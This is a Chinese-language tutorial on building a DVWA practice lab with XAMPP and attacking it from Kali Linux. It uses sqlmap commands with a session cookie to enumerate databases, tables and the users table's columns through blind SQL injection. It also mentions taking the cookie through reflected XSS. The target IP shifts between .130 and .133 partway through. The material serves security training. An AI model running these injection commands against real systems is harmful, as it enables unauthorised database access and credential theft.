1.进行靶场搭建
准备两台虚拟机
靶机:win7
攻击机:kali linux
| win7 | IP 172.26.0.130 |
| kali linux | IP 172.26.0.129 |
虚拟机搭建好后,相互ping能ping同就行
安装xampp
XAMPP Installers and Downloads for Apache FriendsXAMPP is an easy to install Apache distribution containing MariaDB, PHP and Perl.
https://www.apachefriends.org/zh_cn/index.html
xampp内包含以下三种功能模块,xampp可用于快速开发搭建自己的php网站
| PHP | 动态网页设计语言 |
| Apache | 网络服务器 |
| Mysql | 关系型数据库管理系统 |
安装好后的页面

2.搭建dvwa靶场
下载dvwa
https://github.com/digininja/DVWA
下载后解压将解压的dvwa文件放到xampp安装目录的htdocs文件夹里

完成后启动xampp,并启动xampp里的apache和mysql后面按钮start进行启动,当apache与mysql变成下图绿色后就行了

3.靶场搭建完成
验证靶场是否搭建成功,用攻击机kali的浏览器访问172.26.0.130/dvwa(172.26.0.130为靶机ip地址,dvwa是解压后dvwa的文件名)

进入后输入账号:admin密码:password点击login即可登录,并进入靶场主界面,然后选择sql注入

4.对靶场账号密码进行破解
打开 kali终端输入sqlmap(kali系统自带sqlmap工具无需下载)
| sqlmap | sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。 |

通过反射型xss拿到cookie值(需要登陆所以需要cookie)

通过sqlmap得到当前服务器所有数据库
sqlmap -u "http://172.26.0.130/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' --dbs

| --dbs | 显示所有数据库 |
通过sqlmap继续查看dvwa库的所有表(可得guestbook表与users表)
sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa --tables

| -D | 选择数据库 |
| --tables | 查看所有表 |
据此我们可猜测一下账号密码会在哪个表里(首先盲猜是在users表里,查看字段是找到账号密码的手段之一,一般账号字段为user,密码字段为password)
sqlmap -u "http://172.26.0.133/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie 'security=low; PHPSESSID=md26gc5jbodavaqr6pu119v4kg' -D dvwa -T users --column

| -T | 选择表 |
| --column | 查看表字段 |
根据返回的字段我们可以肯定该靶场账号密码都在users表里
我们继续对账号密码进行爆破

| -C | 选择字段 |
| --dump | 获取字段中的数据 |

本次教程完毕
希望三连



















